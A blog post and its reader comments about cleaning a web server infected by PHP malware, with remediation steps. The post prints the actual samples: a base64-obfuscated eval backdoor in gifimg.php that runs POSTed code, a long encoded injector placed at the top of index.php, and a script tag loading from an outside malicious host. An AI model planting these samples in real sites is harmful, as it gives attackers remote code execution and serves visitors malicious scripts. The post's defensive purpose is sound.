Its been a while since the last attack on my server by the iframe virus, today I got another kind of attack but this time is more into javascript(.js) files that have base64_decode codes.
You will know that your website or server being attach by the hacker or virus if you got the following symptoms :-
1) gifimg.php files bing created on “image” folder of the effected account.
Inside the file got below codes :-
< ? php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>
2) few effected files being injected with some encoded codes at the bigenning of the effected files, eg. file index.php :-
< ? php eval(base64_decode('aWYoIWlzc2V0KCRpdXRrYTEpKXtmdW5jdGlvbiBpdXRrYSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJwaGVucHNlVzU0TG01bGRDOVFhRzkwYjBGc1luVnRjeTloY25ScGMzUk5iM1Z6Wlc5MlpYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gaXV0a2EyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGl1dGthMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXV0a2ExKSljYWxsX3VzZXJfZnVuYygkaXV0a2ExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2l1dGthJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2l1dGthJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGl1dGthbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXV0a2EyJykpIT0naXV0a2EyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs='));
3) some index.html/index.htm/index.php files that has been effected was injected with iframe script as below (redirect address may vary) :-
< script src = http://amusecity.com/ii/smple.php >
4) If you are using any contact form script in your server, you will get an email alert reported there is a potential of spam emails spreading from your account :-
Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM./home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:195: $fullmsg .= "----------------------------------------------------------------------------\n";
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:196: mail($email, $subject ." ". $subj_suffix, $fullmsg, $headers);
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:197: } else {
---
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:206: $fullmsg .= "----------------------------------------------------------------------------\n";
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:207: mail($recipient, $subject ." ". $subj_suffix, $fullmsg, $headers);
/home/kxxxx/public_html/wp-content/plugins/wp-contact-form/wp-contactform.php:208: }
---
/home/kxxxx/public_html/wp-includes/pluggable.php:379:
/home/kxxxx/public_html/wp-includes/pluggable.php:380: // Set to use PHP's mail()
/home/kxxxx/public_html/wp-includes/pluggable.php:381: $phpmailer->IsMail();
So what is the best solution for such an attack?
1) First you need to repair all those effected files with un-effected/original/backup files. You can filter those file by looking at the file detail (last created/edited), usually the latest created/edit are the effected files (view the file's code to confirm).
Make sure you scan your backup files with the latest antivirus (Recommend avast as iframe remover).
2) Once all the files has been recovered, disable your server ftp for temporary purpose.
3) Then its time for you to change all your account/server/ftp with a strong new password.
4) Enable your ftp server and set them only use 1 connection per session and disable the ftp monitoring too.
5) Disable back your ftp server and only enable them when you want to use ftp in your end.
That's all.
Goodluck!
Scammer Alert team.
Dear Team,
I have more than 500 web sites at my server, i am doing these steps from last few months from the day when the iframe infected few sites, we cleaned even we restored from backup files and uploaded the files too.
But this comes back on other web or most often on the same site.
What i need to do for this?
Regards,
Umer
Hi Umer,
did you have disable ftp service after you had restore all your site with the clean files?
You could only enable ftp service and set only one connection per-session whenever you want to use it.
it seems that the source of the problem is a virus infecting the computer that is used to upload files – it steals you ftp password and sends it off to the hackers.
start by scanning for and removing any viruses at the pc end, and once that’s cleaned up, change the ftp passwords, and delete the extraneous script-kiddie debris. make sure you get all of them!
thanks for the tips tom, much appreciate
Thanks for the great article. I’ve got the same problem with some galleries I have on my website. Every day my files get changed and the base64_decode gets added to a couple of files. Because of this, the galleries don’t work anymore. Every day I change the files manually. (got a back-up on my computer and just replace them. After this, everything works fine)
I’ve checked my computer for spyware and viruses, but found nothing. Unfortunately I don’t have access to the whole server (so I can’t disable server FTP). But I’ve always saved my passwords. Now I disabled this and changed the passwords. I hope everything works from now on.
Do you think it has got something to do with my ftp software (CoreFTP) or is it just a server problem?
Nice to see you posting on this topic, I have to book mark this web site. Keep up the good work.
Thanks for suggestion
great article unfortunately i discovered it after I have solved the problem.
Could you please tell us the name of the Trojan that appears on the photo of your av software, or the Trojan name that steals the passwords of the ftp.
thank you
Just cleaned up the same issue in my website. Y’all might want to keep a lookout for files that has:
1. the added php tag (in php files)
2. gifimg.php
3. js files with added tags.
4. html files with added url (to the spam site)
The above were the files I cleaned up. Other steps I took were the ones mentioned above: limit ftp (unfortunately, I can’t disable mine competely), change pw, etc.
I’ve no trojans in my pc, though – has avast running 24/7 with intermittent random (other) scans.
BTW, this site is still marked as malware site by google. You might want to take it up with them – or re-scan your site. =)
Hi,
thanks for the bump and give an alert about site marked as malware by google.
I’ve added the site to google webmaster tool, verified the site, submit sitemap, and run the Diagnostics tools and found no malware (Google has not detected any malware on this site.).
Spywares and Viruses do really give me one heck of a headache.“: